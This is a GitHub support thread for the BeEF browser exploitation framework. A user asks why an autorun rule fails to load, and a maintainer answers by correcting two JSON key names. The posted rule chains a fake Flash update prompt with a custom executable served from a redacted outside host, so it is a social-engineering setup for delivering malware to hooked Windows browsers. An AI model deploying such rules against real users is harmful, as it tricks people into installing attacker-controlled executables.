### ISSUE TITLE
[ARE] arerules error (undefined method `each' for nil:NilClass)

### ISSUE THREAD

**Issue by f3rrg** [beefproject/beef#1566]
Hello! 
I need help, please! I have the latest version of BeeF. I`m try to create ARE autorun rule. But have such error. What I`m doing wrong?

My JSON file  in folder "arerules/enable"

`{
	"name": "Fake Flash Update",
	"author": "mh",
	"browser": "ALL",
	"browser_version": "ALL",
	"os": "Windows",
	"os_version": "ALL",
	"modules": [
		{
			"name": "fake_flash_update",
			"condition": null,
			"options": {
				"image": "http://xxxxxxx.xx/eng.png",
				"payload": "Custom_Payload",
				"payload_uri": "http://xxxxxxx.xxx/xxx.exe"
		
			}
		}
	],
	"execute_order": [
		0
	],
	"execute_delay": [
		3000
	],
	"chain_mode": "sequential"
}
`

And the ERROR when restart BeeF

`[ 3:58:17][!] undefined method `each' for nil:NilClass
[ 3:58:17][!] [ARE] Ruleset (Fake Flash Update): ERROR. Something went wrong.
[ 3:58:17][*] [ARE] Ruleset (Confirm Close Tab) parsed and stored successfully.
[ 3:58:17][*] BeEF server started (press control+c to stop)
`

**Comment by f3rrg** [comment]
Sorry All! I find my Error

**Comment by bcoles** [comment]
`execute_order` should be `execution_order`
`execute_display` should be `execution_display`
